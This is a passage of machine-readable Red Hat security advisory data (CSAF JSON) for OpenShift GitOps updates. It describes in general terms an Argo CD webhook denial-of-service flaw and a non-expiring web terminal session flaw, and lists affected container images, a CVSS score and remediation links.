"summary": "https://www.cve.org/CVERecord?id=CVE-2024-40634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40634"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40634"
},
{
"category": "external",
"summary": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w",
"url": "https://github.com/argoproj/argo-cd/security/advisories/GHSA-jmvp-698c-4x3w"
}
],
"release_date": "2024-07-22T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-08-01T10:48:26+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:4972"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:09a25a05e5d7e786beb2aeb2900cdf9d9b7318a87065539d818d48ca12097efb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:31fadc4e401db9f7af9d06100dba0999525940a1ccb256dd0befcfd80f427c90_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:5b5783216e793d74aad31abaa18e644f21ce645e736c6e4faaf061c51ffced18_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/argo-rollouts-rhel8@sha256:9ae9beb8a3c1c4ace3f2c37d230416cf52426816105a3b9ea759bb5b7de5547a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:dbd4a26ceb74570bb3d3b4b9ef911f6d8c14c2affdd4627fcf666bdbf88b922b_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:ea0181fdffaea17edf31b32830075f33e5bd7e5e951fb12c7734a3beb5fb6a12_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:f209de3c136c821251fb8e892250c79ab47c02bc7b4f773b280aeef9acacbe41_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/argocd-rhel8@sha256:fb0f944ef8c85fdd51e9d4ffa785217436989bb9388935392b9743f6c0157fb4_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:3f6354df560a086dd2d3d066bb316fa29b2f90409664352da5b4d5379b1bd59a_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:826924158016a472f215b2154a3b71b0bb45dcb5faee4009023a9ff91b80fbc7_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:b059fed1e6cbdfa744ca40f63eebd7852918e60f6e63a56e6c4c8b47cfb7297a_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/console-plugin-rhel8@sha256:bef56e9030b779020fd4d424af1c4da8bcdf46a89d1d5505cacda5aba17b3f5f_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:07bd1d4c9625d632c25f9b26f5afab0a0b385a01ceda8262a20d63d9380363c0_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:aa363327f2abce3c55dd7343c1024d0f46826e8d4da66126e63181702542352c_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:c6339f1ca0a031eedc1f77755f84c10bc096603c62e4d41266c1f57c723a5fe8_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/dex-rhel8@sha256:d668d7dd535b8bd007d6d9c667a847aadd4184e60bff23c13710034d99b4cb78_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-operator-bundle@sha256:8d786bb519f9caa8c56b5a1de9bbfa92161f697644329114af3af5f324797787_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:16c13cf844a266006ca6242a13be9e5d3a1f57b561fbc0eb4fd22914a0297913_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:2da7b90a1c514f1d86d90b6f546c26480377d6f752deca9ae6bc3d23ff3bb991_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:7eed2ed5c7db8a702917e5f989a4742be3d0e63dc41a3ac6e2dd9d8a2ef586ec_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8-operator@sha256:f269a0edec8e132ca4a8bbc8c2fcec5bbe8b992c6f4fb731f4f457f0881e95eb_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:3adcc88984e8c288ecd8a0ae3b3a3dbf6e6d9260432bc934772060bd4d477d70_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:5de8d57c81bc70b3112cd331dfa701f1bc995eba8568a1cf71c4390538efaf06_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:b6ce0737682b89998c094db766d464eaac7717f4af6df87fb927d74892ac9056_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/gitops-rhel8@sha256:f26223d724c39de4b86d1abf3db446b38fdcd7231323f8ffe34a11f2a4db033c_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:523305513ec6ea969620607c0bf5bea96eb192b14dec0d5660cbc28dae9f9552_ppc64le",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:71532e658e81a9daeb5d84c29851a56b8fe1b20f7a38bd3783002d0f3f611272_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:dfd515876281d0eeffa51ad725bda5c48da3a9225f5e577e41a0aec58614a582_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/kam-delivery-rhel8@sha256:f69026a41ac59c45855de3575b70fe94821f74686abf92125f9d0ef28918db9d_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:1f066935b3a9de1add896aa3c17da8918afd418669bb541a25b27708dd9752cd_s390x",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:3b669408440a2e15c285e62c20656198c7f0caecc04d2f10b4abcc649fddf887_arm64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:68edbdcbd72a6ccf7d07d04e148227673ad34c8add04d9ab4770f4bbf3937974_amd64",
"8Base-GitOps-1.11:openshift-gitops-1/must-gather-rhel8@sha256:c3b22b39fccff18999ae7c11ea239f8ca2189b18e8c9ab770e81c35ba6a02632_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "argocd: Unauthenticated Denial of Service (DoS) Vulnerability via /api/webhook Endpoint in Argo CD"
}
]
}
RHSA-2024:4973
Vulnerability from csaf_redhat - Published: 2024-08-01 11:04 - Updated: 2026-03-18 16:23A flaw was found in Argo CD. Affected versions of Argo CD have a bug where open web terminal sessions do not expire. This bug allows users to send WebSocket messages even if the token has expired. The most straightforward scenario occurs when a user opens the terminal view and leaves it open for an extended period. This flaw allows users to view sensitive information even after logging out.
A vulnerability was found in Argo CD. This flaw allows an unauthenticated attacker to send a specially crafted large JSON payload to the /api/webhook endpoint, causing excessive memory allocation leading to service disruption by triggering an out-of-memory (OOM) kill. The issue poses a high risk to the availability of Argo CD deployments.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update is now available for Red Hat OpenShift GitOps v1.12.5. Red Hat\nProduct Security has rated this update as having a security impact of Important.\nA Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Errata Advisory for Red Hat OpenShift GitOps v1.12.5.\n\nSecurity Fix(es):\n\n* openshift-gitops-argocd-container: Unauthenticated Denial of Service\nVulnerability via /api/webhook Endpoint in Argo CD [gitops-1.12](CVE-2024-40634)\n* openshift-gitops-container: Argo CD web terminal session doesn\u0027t expire [gitops-1.12](CVE-2023-40025)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE page(s)\nlisted in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2024:4973",
"url": "https://access.redhat.com/errata/RHSA-2024:4973"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_4973.json"
}
],
"title": "Red Hat Security Advisory: Errata Advisory for Red Hat OpenShift GitOps v1.12.5 security update",
"tracking": {
"current_release_date": "2026-03-18T16:23:51+00:00",
"generator": {
"date": "2026-03-18T16:23:51+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.7.3"
}
},
"id": "RHSA-2024:4973",
"initial_release_date": "2024-08-01T11:04:17+00:00",
"revision_history": [
{
"date": "2024-08-01T11:04:17+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2024-08-01T11:04:17+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-03-18T16:23:51+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.12",
"product": {
"name": "Red Hat OpenShift GitOps 1.12",
"product_id": "8Base-GitOps-1.12",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.12::el8"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift GitOps 1.12",
"product": {
"name": "Red Hat OpenShift GitOps 1.12",
"product_id": "9Base-GitOps-1.12",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift_gitops:1.12::el9"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift GitOps"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:50d0f3f3f9fa326e666bd3d10925cf8b833db3d6d2dd74ddb892df038538505d?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678_s390x",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:5a9383d8434b4e435d87fa2cecef424f99474bd9a0cb4ea7f7ec503e5dcf0678?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5_s390x",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:c26725f56d3fe072550431d490cd4faefc7bed9dc624d5f6c240044e736accc5?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:a0684ea750c0aef0ee43e8802a41464d2d6a59a33e698e871b544e7052a6ebc8?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:af0b83accf4344127f61b381dd4f520cda86ade8ee983f1c1ebf11a439f021a7?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:178d6bd716c9054f92c9f3889b9f005ca5fd9934b39834e7e13bb34600b24b6b?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46_s390x",
"product_identification_helper": {
"purl": "pkg:oci/must-gather-rhel8@sha256:888cc5b63ecee0f30e1ae45faf5ccb2d17c73c902a918b9c2e5abe85f8579f46?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/must-gather-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"product": {
"name": "openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"product_id": "openshift-gitops-1/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29_s390x",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8-operator@sha256:f979017b7f16d95047c74a087eac689f339cb0a6ad8fa740c138151162a83e29?arch=s390x\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8-operator\u0026tag=v1.12.5-5"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"product_id": "openshift-gitops-1/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel8@sha256:3bd5a449c9f9d8f36dcb190c5cf245c7700993a81cf44a65ef3bc3e23bbf1661?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64",
"product": {
"name": "openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64",
"product_id": "openshift-gitops-1/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argocd-rhel9@sha256:c5cbc537b3079fc08d118434ac23e262d9e679adf4143d2be05009831bfa3e6f?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argocd-rhel9\u0026tag=v1.12.5-2"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"product": {
"name": "openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"product_id": "openshift-gitops-1/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75_amd64",
"product_identification_helper": {
"purl": "pkg:oci/argo-rollouts-rhel8@sha256:18b430d162405a964f846242be0c3b7014be4c33689a3a8743b44238c9d7fb75?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/argo-rollouts-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"product": {
"name": "openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"product_id": "openshift-gitops-1/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4_amd64",
"product_identification_helper": {
"purl": "pkg:oci/console-plugin-rhel8@sha256:e3979829c8f831fac5a8f7e22e620b8d79cb223dc973a4d9d1fe3b6245bf6ab4?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/console-plugin-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"product": {
"name": "openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"product_id": "openshift-gitops-1/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/gitops-rhel8@sha256:5f9ae6792724ac2e40928d65981d33d54cb29e0d03a4c76eb18deabdf76601bc?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/gitops-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"product": {
"name": "openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"product_id": "openshift-gitops-1/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5_amd64",
"product_identification_helper": {
"purl": "pkg:oci/dex-rhel8@sha256:dbcaa78bc38f4f413eb826f39473c775ec47e64dd17a8779f2c74bf1e65631b5?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/dex-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"product": {
"name": "openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"product_id": "openshift-gitops-1/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kam-delivery-rhel8@sha256:9f4d4a389a54f9c58527e7b5177b11b2f2829ef59a56fae3a4f70192a4823b32?arch=amd64\u0026repository_url=registry.redhat.io/openshift-gitops-1/kam-delivery-rhel8\u0026tag=v1.12.5-5"
}
}
},
{
"category": "product_version",
"name": "openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"product": {
"name": "openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"product_id": "openshift-gitops-1/must-gather-rhel8@sha256:02ebf2575bd5991d75d02355967659c71e52f1e7e86bf92e05e614280712552a_amd64",
"product_identification_helper": {
